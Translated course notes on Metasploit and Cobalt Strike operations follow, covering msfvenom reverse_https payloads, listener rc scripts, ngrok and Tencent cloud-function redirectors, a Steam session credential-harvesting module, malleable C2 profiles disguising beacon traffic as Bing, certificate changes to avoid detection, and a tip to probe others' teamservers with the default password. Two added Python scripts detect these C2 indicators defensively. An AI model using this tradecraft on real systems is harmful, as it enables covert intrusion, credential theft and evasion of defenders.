11. MSF and CS supplement
Pre-class discussion
AWS cloud penetration testing
The AWS console and the machines are two separate things that are linked to each other: the console controls part of what a machine does, part of it you cannot control from there, and the console can also link to other products. In practice, AWS engagements all start from the API key. If you do something bad inside the cloud environment, the other side simply restores a snapshot and it is gone, so it is still better to start from the cloud service account.
0x01. MSF
1. Writing an MSF rc file
An rc file is MSF's own variant of a Ruby file; you can think of it simply as an MSF batch file.
# Set up a listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <the IP you need>
set lport <the port you need>
exploit
# Usage
msfconsole -r xxx.rc
2. Using an HTTPS listener in MSF
MSF is essentially a full TCP connection, but as we know TCP carries its data unencrypted and is easy to analyse, so the HTTPS listener was introduced. Everyone knows HTTPS adds a layer of SSL certificate encryption; a paid certificate is recommended, since a free one has some chance of being decrypted.
1. Generate an SSL certificate
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt && cat www.google.com.key www.google.com.crt > www.google.com.pem && rm -f www.google.com.key www.google.com.crt
2.2 Generate the HTTPS payload
# The database bundled with MSF needs to be started
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.112 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=qqy -f exe -o /root/桌面/shell.exe
PayloadUUIDTracking verifies the uniqueness of the payload to prevent malicious reconnections from the target (little impact; it only takes effect when the database is enabled).
HandlerSSLCert specifies the SSL certificate generated a moment ago.
PayloadUUIDName specifies the name of the UUID.
2.3 Set up the HTTPS listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.112
set lport 4444
set payloaduuidtracking true
set handlersslcert server.pem
exploit
handlersslcert is given as a relative path here.
In everyone's testing, check-in did not succeed with self-generated certificates; a certificate has to be bought online.
On applying for a Tencent Cloud certificate in China (there is some verification waiting time in between):
1. Buy a domain
2. Apply for a free SSL certificate
3. The private key (key) has to be added into the pem before it can be used
It still failed; updating MSF is suggested.
3. Using ngrok as an MSF front
1. Register and log in on the Sunny-Ngrok website
2. Choose a tunnel (paid recommended)
3. Open the tunnel and download the client
4. Start the tunnel
./sunny clientid 7a109xxxx5e1bd7
5. Generate the ngrok payload
msfvenom -p windows/meterpreter/reverse_https lhost=64.69.43.237 lport=10206 -f exe -o /root/桌面/shell.exe
lhost is the address you obtained on ngrok (ping it first) and lport its port.
6. Set up the ngrok listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8080
exploit
lhost is set to 127.0.0.1 here because ngrok already points at your IP address; lport is simply the forwarded port.
Note: exposing MSF directly on the public internet is very dangerous; a front like this is relatively safe (a cloud function is very safe).
4. Linking MSF with DingTalk
1. Create a group
2. Create a group bot
3. Copy the webhook
4. Enable DingTalk notifications in MSF
After entering msf:
load -l
load session_notifier
set_session_dingtalk_webhook <your webhook URL>
start_session_notifier
Then set up a normal listener and run.
5. Writing an MSF module
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  include Msf::Post::File          # mixins: file helpers such as read_file/file?
  include Msf::Auxiliary::Report   # mixins: store_loot and friends
  # Include whatever mixins your module actually needs here.

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Windows Gather Steam Client Session Collector.',
      'Description'  => %q{ This module will collect Steam session information from an account set to autologin. },
      'License'      => MSF_LICENSE,
      'Author'       => ['Nikolai Rusakov <nikolai.rusakov[at]gmail.com>'],
      'Platform'     => ['win'],
      'SessionTypes' => ['meterpreter']
    ))
  end
  # The hash above is what `show info` displays.
  # Some modules also declare their `show options` entries up here (register_options).

  # All that is needed to login to another Steam account is config.vdf,
  # setting the AutoLoginUser to the proper username and RememberPassword
  # to 1 in SteamAppData.vdf.
  # Only tested on Win7 x64
  #
  # config.vdf , ContentCache element holds a K,V table of what appears
  # to be UniqueID, Session. This is purely speculation as I have not
  # reversed it to check. However the key is always unique to the account
  # and the value changes whenever the account is logged out and then
  # back in.
  def run
    # The module's actual logic lives here.
    steamappdata = 'SteamAppData.vdf'
    steamconfig = 'config.vdf'
    u_rx = /AutoLoginUser\W*\"(.*)\"/
    # Steam client is only 32 bit so we need to know what arch we are on so that we can use
    # the correct program files folder.
    # We will just use an x64 only defined env variable to check.
    progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
    progfilesx86 = progfiles_env['ProgramFiles(X86)']
    if not progfilesx86.blank? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
      progs = progfilesx86 # x64
    else
      progs = progfiles_env['ProgramFiles'] # x86
    end
    path = "#{progs}\\Steam\\config"
    print_status("Checking for Steam configs in #{path}")
    # Check if all the files are there.
    if directory?(path) && file?("#{path}\\#{steamappdata}") && file?("#{path}\\#{steamconfig}")
      print_status("Located steam config files.")
      sad = read_file("#{path}\\#{steamappdata}")
      if sad =~ /RememberPassword\W*\"1\"/ # this is the PoC check
        print_status("RememberPassword is set! Accountname is #{u_rx.match(sad)[1]}")
        scd = read_file("#{path}\\#{steamconfig}")
        steam_app_data_path = store_loot('steam.config', 'text/plain', session, sad, steamappdata)
        print_good("The file SteamAppData.vdf has been stored on #{steam_app_data_path}")
        steam_config_path = store_loot('steam.config', 'text/plain', session, scd, steamconfig)
        print_good("The file config.vdf has been stored on #{steam_config_path}")
        print_status("Steam configs harvested successfully!")
      else
        print_error("RememberPassword is not set, exiting.")
        return
      end
    else
      print_error("Steam configs not found.")
      return
    end
  end
end
6. MSF and Python
Purpose: enables CS-like distributed deployment and batch operations.
# Install
pip3 install pymetasploit3
# Driving msf
load msgrpc                 # prints the connection details for the MSF RPC service
# load msgrpc Pass=123      # specifies the password
msf6 > load msgrpc
[*] MSGRPC Service: 127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: 3Ly5NdVr
[*] Successfully loaded plugin: msgrpc
# Writing this in PyCharm is recommended
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('123', port=55552)  # '123' is the msgrpc password
client.modules.exploits                    # list all exploit modules
exploit = client.modules.use('exploit', '<exploit module to use>')
exploit.options                            # list the module's options
exploit['<option>'] = '<new value>'
payload = client.modules.use('payload', '<payload to use>')
payload.options                            # list the payload's options
payload['<option>'] = '<new value>'
exploit.execute(payload=payload)
client.sessions.list                       # list all sessions
shell = client.sessions.session('<session id>')
shell.write('<command to run>')
shell.read()                               # read the command output
An example of Python combined with MSF: Viper
https://github.com/FunnyWolf/Viper
0x02. CS
1. Changing the default port
vim teamserver
#!/bin/bash
#
# Start Cobalt Strike Team Server
#
# make pretty looking messages (thanks Carlos)
function print_good () {
    echo -e "\x1B[01;32m[+]\x1B[0m $1"
}
function print_error () {
    echo -e "\x1B[01;31m[-]\x1B[0m $1"
}
function print_info () {
    echo -e "\x1B[01;34m[*]\x1B[0m $1"
}
# check that we're r00t
if [ $UID -ne 0 ]; then
    print_error "Superuser privileges are required to run the team server"
    exit
fi
# check if java is available...
if [ $(command -v java) ]; then
    true
else
    print_error "java is not in \$PATH"
    echo "    is Java installed?"
    exit
fi
# check if keytool is available...
if [ $(command -v keytool) ]; then
    true
else
    print_error "keytool is not in \$PATH"
    echo "    install the Java Developer Kit"
    exit
fi
# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
    print_info "Will use existing X509 certificate and keystore (for SSL)"
else
    print_info "Generating X509 certificate and keystore (for SSL)"
    keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
-Dcobaltstrike.server_port=5555   this is where the default port can be changed.
You can search FOFA for Chinese IPs with port 50050 open and see whether 123456 gets you in.
2. Changing the certificate
2.1 Inspecting the certificate: cobaltstrike.store
By default the certificate contains the string cobaltstrike. If you use it as is, you are plainly telling the other side that you are connecting to them with CS, and your identity is fully transparent.
Inspect the default certificate:
┌──(root💀kali)-[~/下载/cobaltstrike4]
└─# keytool -list -v -keystore cobaltstrike.store
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
输入密钥库口令:
密钥库类型: JKS
密钥库提供方: SUN
您的密钥库包含 1 个条目
别名: cobaltstrike
创建日期: 2019年3月17日
条目类型: PrivateKeyEntry
证书链长度: 1
证书[1]:
所有者: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
发布者: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
序列号: 48c38a7f
生效时间: Sun Mar 17 01:39:31 CST 2019, 失效时间: Sat Jun 15 01:39:31 CST 2019
证书指纹:
SHA1: 59:C8:D6:0F:0F:4B:6B:61:AD:DE:CF:3B:D3:B2:9B:72:E9:1A:31:6C
SHA256: 7B:49:FC:58:9E:7E:73:8E:34:57:85:9D:26:99:96:EC:EF:83:F6:93:57:0B:0A:C4:82:C4:26:B1:FA:04:BD:73
签名算法名称: SHA256withRSA
主体公共密钥算法: 2048 位 RSA 密钥
版本: 3
扩展:
#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 7E 80 01 F2 F6 C1 53 51 89 52 36 55 BB 92 D9 99 ......SQ.R6U....
0010: A1 C2 39 10 ..9.
]
]
*******************************************
*******************************************
Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。
The default password is 123456. The listing above is the certificate content after my modification.
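Because every stock teamserver generates its keystore with the same -dname (see the script above), a defender can match that subject on the wire regardless of the fingerprint. The following is an added example, not part of these notes: it scores certificate records with Zeek x509.log-style fields (subject, issuer, not_valid_before, not_valid_after); the two records are constructed, not captured.

```python
"""Score certificate records against the teamserver's built-in keytool subject.

Added example, not from the notes. It assumes certificate observations as dicts
with Zeek x509.log-style fields (subject, issuer, not_valid_before,
not_valid_after); the two records below are constructed, not captured.
"""
from datetime import datetime
from typing import Dict, List

# Subject the stock teamserver script passes to keytool -dname (see the script
# above); keytool prints the S attribute as ST.
DEFAULT_DNAME = {
    "CN": "Major Cobalt Strike", "OU": "AdvancedPenTesting", "O": "cobaltstrike",
    "L": "Somewhere", "ST": "Cyberspace", "C": "Earth",
}
TIME_FMT = "%Y-%m-%dT%H:%M:%S"


def parse_dn(dn: str) -> Dict[str, str]:
    """Split 'CN=a, OU=b' into a dict so attribute order does not matter."""
    parts = {}
    for item in dn.split(","):
        if "=" in item:
            key, value = item.split("=", 1)
            key = key.strip().upper()
            parts["ST" if key == "S" else key] = value.strip()
    return parts


def assess(cert: Dict[str, str]) -> List[str]:
    """Return the indicators one certificate record triggers (empty if none)."""
    findings = []
    subject = parse_dn(cert["subject"])
    issuer = parse_dn(cert["issuer"])
    if subject == DEFAULT_DNAME:
        findings.append("subject is the stock Cobalt Strike teamserver DN")
    elif subject.get("O", "").lower() == "cobaltstrike":
        findings.append("subject organisation is cobaltstrike")
    if subject == issuer:
        findings.append("self-signed")
    # keytool -genkey uses a 90-day validity when -validity is not given, which
    # is exactly what the listing above shows (17 Mar to 15 Jun).
    start = datetime.strptime(cert["not_valid_before"], TIME_FMT)
    end = datetime.strptime(cert["not_valid_after"], TIME_FMT)
    if (end - start).days == 90:
        findings.append("90-day validity (keytool default)")
    return findings


SAMPLE_CERTS = [
    {   # constructed record mirroring the keystore listing above
        "subject": "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth",
        "issuer": "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth",
        "not_valid_before": "2019-03-17T01:39:31",
        "not_valid_after": "2019-06-15T01:39:31",
    },
    {   # constructed benign certificate issued by a CA with a one-year lifetime
        "subject": "CN=www.example.com, O=Example Corp, C=US",
        "issuer": "CN=Example Issuing CA, O=Example Trust, C=US",
        "not_valid_before": "2019-01-01T00:00:00",
        "not_valid_after": "2020-01-01T00:00:00",
    },
]


def scan(certs) -> Dict[int, List[str]]:
    """Map record index -> findings, keeping only records that triggered."""
    return {i: f for i, c in enumerate(certs) if (f := assess(c))}
```

The SHA-1/SHA-256 fingerprints in the listing belong to one keystore generated on that machine's first start, so detection keys on the DN and validity rather than on the fingerprints.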
2.2 Generate a new certificate
keytool -keystore cobaltstrike_new.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias 360.com -dname "CN=US, OU=360.com, O=Software, L=Somewhere, ST=Cyberspace, C=CN"
2.3 Rename it to replace the original file
3. Using a certificate you applied for yourself
3.1 Apply for a certificate
SSL protocol, SSL encryption, free SSL domain certificates | Cloudflare China official site | Cloudflare
or Let's Encrypt, or any of the major cloud service providers
3.2 Use the certificate
pem format:
openssl pkcs12 -export -in /api.xxx.com/sss.pem -inkey /api.xxx.com/ssk.pem -out api.xxx.com.p12 -name api.xxx.com -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore api.xxx.com -src
pem -> p12 -> store file
Add it to the teamserver:
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=40120 -Djavax.net.ssl.keyStore=./api.xx
Add it to the profile file:
https-certificate {
    set keystore "api.xxx.com.store";
    set password "123456";
}
jks format (recommended):
Edit the profile file directly (the CS profile file):
### Code Signing Certificate
code-signer {
    set keystore "server.jks";          ### path to the jks file
    set password "Tz8@CxnJcAN3DM^D";    ### the password
    set alias "server";
}
crt format:
$ keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store
$ keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
4. CS profile file (homework)
The destination of the traffic reveals your CS server IP, which is very dangerous. This file is created by yourself and then placed in the CS directory.
You can check with c2lint whether the file works; on the behaviour-analysis side it can be bypassed.
After doing this, use CS again.
# CobaltStrike 4.0+ Test Profile
#
# References:
# * https://www.cobaltstrike.com/help-malleable-c2
# * https://www.cobaltstrike.com/help-malleable-postex
#
# Author: lengyi@HongHuLab
# Github: https://github.com/lengjibo
#
### Global Option Block
set sample_name "bing.profile"; # Profile name
set sleeptime "30000"; # Sleep time for the beacon callback
# set sleeptime "<60000>"; # 1 Minute
# set sleeptime "<70000>";
# set sleeptime "<80000>";
set jitter "50"; # Jitter to set %. In this example, the beacon will callback between 15 and 30 sec jitter
set dns_idle "8.8.4.4";
set dns_sleep "0";
set maxdns "235";
set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; # User-Agent
### Self-Signed Certificate HTTPS
https-certificate {
set CN "us";
set O "us";
set C "us";
set L "us";
set OU "us";
set ST "us";
set validity "365";
}
### Valid SSL Certificate HTTPS
https-certificate {
set keystore "cobaltstrike.store";
set password "123456";
}
### Code Signing Certificate
code-signer {
set keystore "server.jks";
set password "Tz8@CxnJcAN3DM^D";
set alias "server";
}
### HTTP/S Global Response Header
http-config {
set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By"; # HTTP header
header "Server" "Microsoft-IIS/8.0";
header "Content-Type" "text/html;charset=UTF-8";
header "Cache-Control" "max-age=1";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
set trust_x_forwarded_for "false"; # "true" if the team server is behind an HTTP redirector
}
### SMB Beacon
set pipename "win_svc";
set pipename_stager "win_svc";
### TCP Beacon
set tcp_port "1337"; # TCP beacon listen port
### HTTP-GET
http-get {
set uri "/search/";
client {
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";
metadata {
base64url;
parameter "q";
}
parameter "go" "Search";
parameter "qs" "bs";
parameter "form" "QBRE";
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
netbios;
prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
print;
}
}
}
### HTTP-POST
http-post {
set uri "/Search/";
set verb "GET";
client {
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";
output {
base64url;
parameter "q";
}
parameter "go" "Search";
parameter "qs" "bs";
id {
base64url;
parameter "form";
}
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
netbios;
prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
print;
}
}
}
### HTTP-stager
http-stager {
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
prepend "user=";
append ".asp";
print;
}
}
}
### Stage
stage {
set checksum "0";
set image_size_x86 "559966";
set image_size_x64 "559966";
set entry_point "38807";
set rich_header "\xcd\x11\x8f\xf8\x89\x70\xe1\xab\x89\x70\xe1\xab\x89\x70\xe1\xab\x3d\xec\x10\xab\x9c\x70\xe1\xab\x3d\xec\x12\xab\x0a\x70\xe1\xab\x3d\xec\x13\xab\x90\x70\xe1\xab\xea\x2d\xe2\xaa\x9b\x70\xe1\xab\xea\x2d\xe4\xaa\xae\x70\xe1\xab\xea\x2d\xe5\xaa\x9b\x70\xe1\xab\x80\x08\x72\xab\x82\x70\xe1\xab\x89\x70\xe0\xab\x03\x70\xe1\xab\xe7\x2d\xe4\xaa\x80\x70\xe1\xab\xe7\x2d\x1e\xab\x88\x70\xe1\xab\x89\x70\x76\xab\x88\x70\xe1\xab\xe7\x2d\xe3\xaa\x88\x70\xe1\xab\x52\x69\x63\x68\x89\x70\xe1\xab\x00\x00\x00\x00\x00\x00\x00\x00";
}
### Post-Exploitation
post-ex {
set amsi_disable "false"; # Disable AMSI
}
5. CDN fronting (optional homework)
Since my server cannot use Cloudflare, I will only briefly describe the process.
1. An SSL certificate (self-signed or a free one from a third party)
2. A domain
3. Cloudflare
1. Add the domain you applied for; it is suggested to register the domain at GoDaddy and not to use your own information.
2. At GoDaddy remove the default name servers and change them to Cloudflare's.
3. Set an A record; after adding it, check that it works.
4. Set SSL/TLS.
5. Add an HTTPS beacon.
6. Generate an exe and test check-in.
6. Cloud function fronting (optional homework)
The teamserver must be deployed on a public IP; the IPs the target connects back to are all Tencent IPs, and they change as well.
6.1 Log in to the Tencent Cloud console and configure a cloud function (Tencent as the example; real-name verification required)
6.1.1 Log in to the Tencent Cloud console, search for cloud functions and choose New
6.1.2 Use custom creation
6.1.3 Write the code
import json, requests, base64

def main_handler(event, context):
    C2 = 'http://116.63.138.59'  # HTTP or HTTPS can be used here
    path = event['path']
    headers = event['headers']
    print(event)
    # forward the request with the same method, path and headers
    if event['httpMethod'] == 'GET':
        resp = requests.get(C2 + path, headers=headers, verify=False)
    else:
        resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
    print(resp.headers)
    print(resp.content)
    # the API gateway expects a base64-encoded body when isBase64Encoded is set
    response = {"isBase64Encoded": True, "statusCode": resp.status_code, "headers": dict(resp.headers),
                "body": base64.b64encode(resp.content).decode()}
    return response
6.1.4 Create a trigger
6.1.5 Click the API service name and change it to the root path
Save the domain from our public access address:
service-33fp49rg-1301783483.gz.apigw.tencentcs.com
6.2 Configure the CS profile
set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";

http-get {
    set uri "/api/x";
    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;
            print;
        }
    }
}

http-stager {
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}

http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}
Start CS:
./teamserver <ip> <password> tencent.profile
Then configure the CS listener,
and the beacon checks in.
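Both profiles on this page (the bing.profile in section 4 and the tencent.profile above) leave fixed strings in every request, and that is what a defender looks for. The following is an added example, not from these notes or from the profile authors: it applies those indicators to constructed proxy-log-style records (dest, method, uri, headers, resp_headers); nothing in it is captured traffic.

```python
"""Flag proxy records matching the two malleable C2 profiles on this page.

Added example, not part of the notes. Records are constructed dicts in a
proxy-log-like shape; nothing here is captured traffic.
"""
import re
from typing import Dict, List

# Literal Cookie from the bing.profile client blocks: every beacon using that
# profile sends exactly this value, so it is a static indicator.
STATIC_COOKIE = "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"
# bing.profile's useragent claims "Windows NT 7.0"; no Windows release reports
# that NT version (Windows 7 is NT 6.1), so the string is a profile artefact.
BOGUS_NT = re.compile(r"Windows NT 7\.0\b")


def assess(rec: Dict) -> List[str]:
    """Return the indicators a single request/response record triggers."""
    hits = []
    req = {k.lower(): v for k, v in rec["headers"].items()}
    resp = {k.lower(): v for k, v in rec["resp_headers"].items()}
    if req.get("cookie") == STATIC_COOKIE:
        hits.append("static bing.profile cookie")
    if BOGUS_NT.search(req.get("user-agent", "")):
        hits.append("impossible Windows NT version in User-Agent")
    host = req.get("host", "")
    if host and host != rec["dest"]:
        hits.append(f"Host header {host} does not match destination {rec['dest']}")
    # tencent.profile answers plain GETs with an OCSP response body type; real
    # OCSP responders reply to POSTed application/ocsp-request bodies.
    if (resp.get("content-type") == "application/ocsp-response"
            and req.get("content-type") != "application/ocsp-request"):
        hits.append("OCSP response type without an OCSP request")
    return hits


SAMPLE_RECORDS = [
    {   # constructed: bing.profile http-get towards a server that is not Bing
        "dest": "203.0.113.10", "method": "GET",
        "uri": "/search/?q=YWJj&go=Search&qs=bs&form=QBRE",
        "headers": {"Host": "www.bing.com", "Cookie": STATIC_COOKIE,
                    "User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; "
                                  "InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"},
        "resp_headers": {"Server": "Microsoft-IIS/8.5",
                         "Content-Type": "text/html; charset=utf-8"},
    },
    {   # constructed: tencent.profile http-get through the API gateway domain
        "dest": "service-33fp49rg-1301783483.gz.apigw.tencentcs.com", "method": "GET",
        "uri": "/api/x",
        "headers": {"Host": "service-33fp49rg-1301783483.gz.apigw.tencentcs.com",
                    "Accept": "*/*", "Cookie": "SESSIONID=ZmFrZWRhdGE=",
                    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) "
                                  "Gecko/20100101 Firefox/80.0"},
        "resp_headers": {"Content-Type": "application/ocsp-response", "Server": "nginx"},
    },
    {   # constructed: ordinary browsing, should not trigger anything
        "dest": "www.example.com", "method": "GET", "uri": "/",
        "headers": {"Host": "www.example.com",
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"},
        "resp_headers": {"Content-Type": "text/html"},
    },
]


def scan(records) -> Dict[int, List[str]]:
    """Map record index -> indicators, keeping only records that triggered."""
    return {i: hits for i, r in enumerate(records) if (hits := assess(r))}
```

The Host/destination comparison is a heuristic for explicit proxies; behind a transparent proxy compare the Host header with the TLS SNI instead.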
7. Linking CS with Server酱 (DingTalk recommended)
1. Apply for the API
http://sc.ftqq.com/3.version   Log in with a GitHub account, save the generated SCKEY, and enable WeChat push.
2. Write the plugin
It uses the Sleep language, which is quite niche. The language is event-driven (when such-and-such happens, do such-and-such), which fits our need exactly: when a beacon comes in, send a request to Server酱, and the WeChat contact Server酱 then delivers the notification.
# Plugin source
on beacon_initial {
    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];
        @content = readAll($handle);
        foreach $line (@content) {
            $output .= $line . "\r\n";
        }
        println($output);
    }
    # collect the beacon's IP, computer name and logged-in user
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    # GET the Server酱 link
